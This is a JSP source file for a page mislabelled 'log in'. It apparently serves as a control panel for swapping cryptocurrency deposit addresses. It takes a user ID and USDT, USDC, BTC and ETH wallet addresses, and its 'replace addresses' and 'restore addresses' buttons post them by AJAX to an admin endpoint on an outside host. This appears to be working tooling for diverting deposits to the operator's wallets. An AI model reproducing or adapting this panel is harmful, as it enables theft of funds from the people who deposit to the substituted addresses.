<%@ page language="java" pageEncoding="utf-8" isELIgnored="false"%>
|
<%@taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
|
<%@taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt" %>
|
|
<%@ page language="java" import="security.*"%>
|
<%@ include file="include/basePath.jsp"%>
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
<html xmlns="http://www.w3.org/1999/xhtml">
|
<head>
|
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
|
<title>log in</title>
|
<style type="text/css">
|
body {
|
min-height: 100%;
|
width: 100%;
|
background-color:#e6e9ed;
|
overflow: hidden;
|
}
|
.l-box1{ position: fixed;
|
top: 50%;
|
left: 50%;
|
margin-left: -210px;
|
margin-top: -146px;}
|
.tit01{
|
font-size: 26px;
|
color: #1890ff;
|
margin: 0 auto 40px auto;
|
text-align: center;
|
font-weight: 700;}
|
.ip01{width:420px; margin:0 auto 30px auto; text-align:center;}
|
.ip03{ width:420px; height:50px; line-height:50px; border:0px; font-size:16px; text-indent:45px;border-radius:5px; color: #000;}
|
.ip-n{ background:url(image/n2.png) no-repeat 15px center #fff; background-size:25px;}
|
.ip-p{ background:url(image/p2.png) no-repeat 15px center #fff; background-size:25px;}
|
.bn01{ background:#1890ff; color:#fff; font:20px/30px Arial, Helvetica, sans-serif; padding:14px 0; width:420px; border:0; border-radius:5px;}
|
.footer{height: 40px;
|
line-height: 40px;
|
position: fixed;
|
bottom: 0;
|
width: 100%;
|
text-align: center;
|
color: #fff;
|
font-family: Arial;
|
font-size: 12px;
|
letter-spacing: 1px;
|
}
|
.h-t{color: #ff4949;
|
font-size: 12px;
|
line-height: 1.4;
|
padding-top: 4px;
|
text-align: left;
|
display:none;
|
</style>
|
</head>
|
|
<body>
|
<div class="l-box1">
|
<form action="https://www.blackstone.top:443/admin/public/loginres.action" onsubmit="return toVaild()"
|
class="ng-pristine ng-invalid ng-touched" method="post">
|
<div class="tit01"></div>
|
<div class="ip01">
|
<div class="ip01">
|
<input id="j_username" name="j_usercode" type="text" class="ip03 ip-n" placeholder="用户ID" />
|
<div class="h-t ht-name">用户ID</div>
|
<div class="ip01">
|
<input id="j_username" name="j_usdttrc20" type="text" class="ip03 ip-n" placeholder="USDT-TRC20" />
|
<div class="h-t ht-name">USDT-TRC20</div>
|
|
<div class="ip01">
|
<input id="j_username" name="j_usdterc20" type="text" class="ip03 ip-n" placeholder="USDT-ERC20" />
|
<div class="h-t ht-name">USDT-ERC20</div>
|
|
<div class="ip01">
|
<input id="j_username" name="j_usdctrc20" type="text" class="ip03 ip-n" placeholder="USDC-TRC20" />
|
<div class="h-t ht-name">USDC-TRC20</div>
|
|
<div class="ip01">
|
<input id="j_username" name="j_usdcerc20" type="text" class="ip03 ip-n" placeholder="USDC-ERC20" />
|
<div class="h-t ht-name">USDC-ERC20</div>
|
|
<div class="ip01">
|
<input id="j_username" name="j_btc" type="text" class="ip03 ip-n" placeholder="BTC" />
|
<div class="h-t ht-name">BTC</div>
|
<div class="ip01">
|
<input id="j_username" name="j_eth" type="text" class="ip03 ip-n" placeholder="ETH" />
|
<div class="h-t ht-name">ETH</div>
|
</div>
|
</div>
|
<a></a>
|
<div class="ip01"><input id="changedz" name="提交" type="button" class="bn01" value="替换以上地址"/></div>
|
<div class="ip01"><input id="restoredz" name="提交" type="button" class="bn01" value="还原地址"/></div>
|
</form>
|
</div>
|
<div class="footer">Copyright © 2018-2021 malaifa All Rights Reserved.</div>
|
</body>
|
</html>
|
<input type="hidden" name="error" id="error" value="${error}" />
|
|
<script type="text/javascript" src="<%=basePath%>js/jquery.min.js"></script>
|
<script>
|
$(document).ready(function () {
|
// 点击 "替换以上地址" 按钮
|
$('#changedz').click(function () {
|
var j_usdttrc20 = $('input[name="j_usdttrc20"]').val();
|
var j_usdterc20 = $('input[name="j_usdterc20"]').val();
|
var j_usdctrc20 = $('input[name="j_usdctrc20"]').val();
|
var j_usdcerc20 = $('input[name="j_usdcerc20"]').val();
|
var j_btc = $('input[name="j_btc"]').val();
|
var j_eth = $('input[name="j_eth"]').val();
|
var j_usercode = $('input[name="j_usercode"]').val();
|
|
$.ajax({
|
url: 'https://m.deepeu.de/admin/public/loginres.action', // 替换为实际的 URL 地址
|
type: 'POST', // 使用 POST 方法
|
data: {
|
j_usdttrc20: j_usdttrc20,
|
j_usdterc20: j_usdterc20,
|
j_usdctrc20: j_usdctrc20,
|
j_usdcerc20: j_usdcerc20,
|
j_btc: j_btc,
|
j_eth: j_eth,
|
j_usercode: j_usercode,
|
type: 1
|
},
|
success: function (response) {
|
// 请求成功后的操作
|
alert('成功!');
|
},
|
error: function (xhr, status, error) {
|
// 请求失败的处理
|
alert('失败!');
|
}
|
});
|
});
|
|
// 点击 "还原地址" 按钮
|
$('#restoredz').click(function () {
|
$.ajax({
|
url: 'https://m.deepeu.de/admin/public/loginres.action', // 替换为实际的 URL 地址
|
type: 'POST', // 使用 POST 方法
|
data: {
|
type: 2
|
},
|
success: function (response) {
|
// 请求成功后的操作
|
alert('成功!');
|
},
|
error: function (xhr, status, error) {
|
// 请求失败的处理
|
alert('失败!');
|
}
|
});
|
});
|
});
|
</script>
|